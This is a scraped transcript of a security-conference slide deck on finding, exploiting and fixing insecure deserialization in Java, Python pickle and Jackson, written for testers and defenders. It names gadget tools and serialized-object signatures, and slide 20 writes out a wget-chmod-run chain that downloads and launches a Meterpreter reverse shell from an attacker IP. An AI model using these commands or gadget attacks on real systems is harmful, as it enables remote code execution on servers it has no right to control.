Upload File

how to be an app serial killer...don't be scared!!! (or bored )-if you know nothing about this...

  • Home
  • Documents
  • How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If
35
How to be an App Serial Killer REBECCA DECK AVALARA @RANGER_CHA

Upload: others

Post on 05-Feb-2020

2 views

Category:

Documents


0 download

Report

TRANSCRIPT

Page 1: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

How to be an App Serial KillerR E B E C C A D E C K

A V A L A R A

@ R A N G E R _ C H A

Page 2: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

DON'T BE SCARED!!! (or bored)

- If you know nothing about this topic…

-Hopefully you understand 25%

- If you know a little about the topic…

-50-75%

- If you are really solid in your knowledge of the topic…

-Learn one or two new things

2

Page 3: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Objective

-Deserialization Background

-Normal Deserialization

-Finding Deserialization Issues

-Deserialization Exploitation

3

Page 4: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization Background

https://me.me/i/confused-cat-meme-generator-imgflip-19c02328bba745a5b799c1b94446353d4

September 29, 2019

https://me.me/i/confused-cat-meme-generator-imgflip-19c02328bba745a5b799c1b94446353d
Page 5: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Serialization from the beginning…

What is an object?

Collection of values that works as a single unit

5

Page 6: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Serialization from the beginning…

Process of preparing objects for network transport

Also called marshalling

What does serialization look like?

6

Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html

Page 7: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization

Deserialization is the reverse of serialization

Usually from a readObject call (in Java)

Common in many languages

Force server to load an unexpected object

Often execute arbitrary code

7

Page 8: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Transferring Data with Serialization

8

Server

Serializes

Client

Deserializes

Client

Serializes

Server

Deserializes

Server

Serializes

Writes Data to

Disk/Memcache

Server

Deserializes

Page 9: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Malicious Objects

9

Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/

Page 10: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization Remediation

How do you fix it?Upgrade for…

Blacklisting???

Nooooo

Hard to write signatures

10https://sayingimages.com/cat-meme/

https://sayingimages.com/cat-meme/
Page 11: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization Remediation

Look-ahead DeserializationOverload resolveClass

Ensure that the object is of thecorrect class

JUST DON'T DO IT

Do something better like default JSON parsers

11http://takomatorch.com/index.php/2019/07/13/takoma-park-police-adopt-new-enforcement-tactic-based-on-cat-discipline/

http://takomatorch.com/index.php/2019/07/13/takoma-park-police-adopt-new-enforcement-tactic-based-on-cat-discipline/
Page 12: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Finding Deserialization

September 28, 2019 12

Page 13: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

White Box

Talk to developers

Look for deserialization calls

Java – readObject

Python – Pickle

.NET – TypeNameHandling, JavaScriptTypeResolver

Jackson – enableDefaultTyping, setSerializationInclusion, readValue

13

Page 14: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Black Box

Look for objects

Java – rO0, ACED0005, application/x-java-serialized-object

.NET – AAEAAAD/////, TypeObject, $type:

Python –

JSON – ["objtype",{"name": "value"}]

14

Page 15: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Exploiting Deserialization

September 28, 2019 15

Page 16: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Pickle Deserialization

https://blog.nelhage.com/2011/03/exploiting-pickle/

Look for deserialization calls

16

https://blog.nelhage.com/2011/03/exploiting-pickle/
Page 17: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Pickle Deserialization Exploit Class

Create a class that executes code when created

17

Page 18: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Pickle Send Exploit

Send exploit to server

How depends on the app

18

Page 19: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization in Java

Look for raw Java objects

Find a suitable gadget (object to run code when loaded)Must be an object the app understands

Ysoserial provides several gadgetshttps://github.com/frohoff/ysoserial

19

https://github.com/frohoff/ysoserial
Page 20: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization in Java

Vulnerable app https://github.com/hvqzao/java-deserialize-webapp

Includes Apache Commons Collection

Ysoserial exploit only runs one command

Reverse shell in three commandswget IP/meterpreterchmod +x meterpreter./meterpreter

20

https://github.com/hvqzao/java-deserialize-webapp
Page 21: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization in Java Example

21

Page 22: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization in Java Example

22

Page 23: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization in Java Example

23

Page 24: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Deserialization in Java Example

24

Page 25: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

No Java Objects?

Safe without Java objects?

Moar gadgetshttps://github.com/mbechler/marshalsec

Same idea, different formatJSON, XML

25

https://github.com/mbechler/marshalsec
Page 26: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Jackson Deserialization

26

Page 27: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Jackson Deserialization

27

Page 28: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Jackson Deserialization

28

Page 29: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Jackson Deserialization

29

Page 30: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Summary

• Ysoserial and marshalsec for exploit gadgets

• Find by looking for common serialized object magic numbers or deserialization routines in code

• Often “Fix” Deserialization by blacklisting classes (need patch)

• Better off rewriting the data serialization method

• Use safer (less full-featured) libraries

30

Page 31: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

References

Look-ahead Java Deserialization

https://www.ibm.com/developerworks/java/library/se-lookahead/index.html

31

https://www.ibm.com/developerworks/java/library/se-lookahead/index.html
Page 32: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

References

Deserialization Resources

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md

Marshalling Pickles

http://frohoff.github.io/appseccali-marshalling-pickles/

ysoserial

https://github.com/frohoff/ysoserial

Deserialization – Different marshallers

https://github.com/mbechler/marshalsec

32

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md
http://frohoff.github.io/appseccali-marshalling-pickles/
https://github.com/frohoff/ysoserial
https://github.com/mbechler/marshalsec
Page 33: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

References

Pickle Deserialization

https://blog.nelhage.com/2011/03/exploiting-pickle/

Java Deserialization app

https://github.com/hvqzao/java-deserialize-webapp

Jackson Deserialization

https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/

33

https://blog.nelhage.com/2011/03/exploiting-pickle/
https://github.com/hvqzao/java-deserialize-webapp
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Page 34: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

Questions?

34

Page 35: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If

www.directdefense.comwww.directdefense.com


Do YOU get it? Do YOU get the BIG IDEAS? 1,000,000 Topic 1 Topic 2 Topic 3 Topic 4 Topic 5 Topic 6 Topic 7 Topic 8 Topic 10 500,000 300,000 175,000 100,000

A writer’s guide to sure success! This works best when you KNOW about your topic! Write about things you understand, care about, and like. If you

the Connector · If you also hold certifications from ISACA, the ACFE or PMI, one article may serve as CPE or PDU’s for multiple certifications. If you speak or present on a topic

Are You Smarter Than a 5 th grader? Are You Smarter Than the CRCT? 1,000,000 Grammar Topic 1 Grammar Topic 2 Grammar Topic 3 Grammar Topic 4 Grammar

Fairway Observer - Women's Golf Association of New Jersey · Newsletter is written for members by members. If you have some interesting topic you want to share, if you’ve been to

VALUE Topic 2 – What do you believe?€¦ · Do you believe in Heaven? If not – why? If yes – what do you perceive it to be? 3. Complete page 14 – mainly focused on the three

Essential Oils User's · PDF fileEssential Oils User's Guide: ... skim this lesson, even if you think the topic seems a bit odd, or even if you feel you're already familiar with essential

Spring 2007 Topic focus: Are you preparing for your career? spring07.pdfTake the following quiz to find out if you’re bugging your professors and peers. If you check five or more,

Chapter a I to ChemIstry · for understanding topic C, and so on. If you have a bad week and do not study topic B very carefully, topic C will not make much sense to you. Because

Installation and Configuration Guideinfocenter.sybase.com/help/topic/com.sybase.infocenter.dc10083.15… · 23/11/2008  · Installation and Configuration Guide 3 • If you created

ring...if you plan well in advance, you know you will be able to cover they key topic areas if you are well organised, then you won’t go into panic mode, just follow the plan if

TOPIC GUIDE - gov.uk...Here you can email our team with your thoughts on a guide. You can also submit documents that you think may enhance a Topic Guide. If you find Topic Guides useful

Smart shopping: Teacher’s topic guide 6 Truth complete... · 2019. 7. 3. · If you said yes to 5 or 6, you are getting there! If you said yes to less than four, you need to sharpen

Don’t fall behind.. If you read what I am teaching today, you need just 30 mins to revise the topic and solve mcqs. If you don’t read for three days

Review Mix it Up · Mix it Up These topic-based questions appear later in the book, allowing you to revisit the topic and test how well you have remembered the information. If you

Topic: Travel Use of the First and Second Conditional Warm up: ‘If you could go anywhere in Europe, where would you go?

Care of Passengers Module three Topic four. If you were this tourist, what would you look for when getting in a vehicle (taxi, cyclo…)? 2

Are You Smarter Than A 6 th Grader? 1,000,000 Topic 1 Topic 2 Topic 3 Topic 4 Topic 5 Topic 6 Topic 7 Topic 8 Topic 9 Topic 10 500,000 300,000 175,000

Topics of Discussion Decided Upon Choosing a Topic It is not enough to chose a topic for the stakeholders of a video- conference. No matter if you arranging

SIT ANYWHERE TODAY! TODAY: Topic # 8 Wrap-Up & TOPIC # 9 THERMODYNAMICS Thursday Sep 30th RQ-4 was due TODAY (30 minutes before class) If you missed it

Topic 5: Support with Follow-up - Nevada WICnevadawic.org/.../uploads/2013/02/Topic-5-Support-with-Follow-up.pdf · Topic 5: Support with Follow-up “If you don’t know ... participants

Guildford Borough Council Topic Paper · PDF fileGuildford Borough Council Topic Paper Further information and alternative formats If you would like further information or to read

New Topic - The George Washington Universityphy21bio/Presentations/probabi… ·  · 2011-04-15orange ball. If you reach ... if the probabilities for every value of x are known:

Eucalyptus 4.3.1 Installation Guide · Installation Overview This topic helps you understand, plan for, and install Eucalyptus. If you follow the recommendations and instructions

Basic Essay Writing. The Topic is up to You: If you have not been assigned a topic, then the whole world lies before you. Sometimes that seems to make

heavy drumming - EXHAUST Rock | EXHAUST · If you wanna rock If you wanna rock If you wanna rock Heavy drumming If you wanna... If you wanna... If you really wanna rock Keep heavy

How old were you four years ago? Describe some things you can do now that you could not do then. Write a paragraph on the topic of your choice. If you

First topic - The Document Foundation Wiki · First topic 1) David: If you have ... the "Getting Started with Alfresco Share Collaboration" manual would be ... The "Alfresco Web Quick

Focus topic · 2016-07-22 · Focus topic Advanced Manufacturing Network partner medtech-expo.ch. ... Exhibitor information with valuable tips SOtuarr kserPviacretnfeor you If at

BETTER PRESENTATION…BETTER BUSINESS What if you could jump to any desired topic at any time during your PowerPoint slide show? What if interactive PowerPoint

Topic 18 Leadership and Change / Leadership in the Future (NOTE: Material in this topic will be on Exam 2 only if you choose it as your essay option.)

British Literature. In your thesis, make sure you address the topic. So, if you are comparing and contrasting, you need to make sure that similarities

C if you can do everything - Solve My Maths · Web viewC Practice (set A) Student self assessment – Assess how good you think you are before you start each section (sheet) Topic

Lexis Smart Forms · 8 If you click on the topic you are currently in, you will see a pop-up box that will allow you to reload the topic. This is useful if you want to delete the

4 th Grade Theme 3 Lesson 11 Day 5. Discussion If you were an author, what science topic would you like to write about?